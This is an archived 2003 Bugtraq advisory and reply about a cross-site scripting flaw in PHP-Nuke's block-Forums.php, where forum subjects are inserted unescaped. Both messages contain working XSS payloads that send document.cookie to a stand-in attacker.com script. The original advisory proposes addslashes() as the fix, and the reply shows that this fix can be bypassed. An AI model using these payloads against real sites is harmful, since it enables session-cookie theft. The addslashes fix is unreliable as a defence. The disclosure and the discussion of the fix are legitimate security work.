I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this :
">
<name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form>
<script>window.open(document.a.u.value+document.cookie)</script>
What do you think about : $title2 = htmlspecialchars($title2, ENT_QUOTES);
From: <lethalman@libero.it> To: bugtraq@securityfocus.com Subject: PHP-Nuke block-Forums.php subject vulnerabilities Date: 31 Mar 2003 11:15:54 -0000
The block-Forums.php file have a vuln if an attacker insert a malformatted subject to a topic of Splatt Forum. A type of subject is:
"><script>alert('bug'");</script>
The 'alt' tag is closed by "> and the other text is normal html. This bug is very bad if a subject is:
"><script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script>
And prova.php register cokkies in a file.
The solution:
Add under "$title2 = stripslashes($title2);" line, this line: "$title2 = addslashes($title2);"
And now, backward any " there is a backslash!
-------------------------- frog-m@n http://www.phpsecure.info
_________________________________________________________________
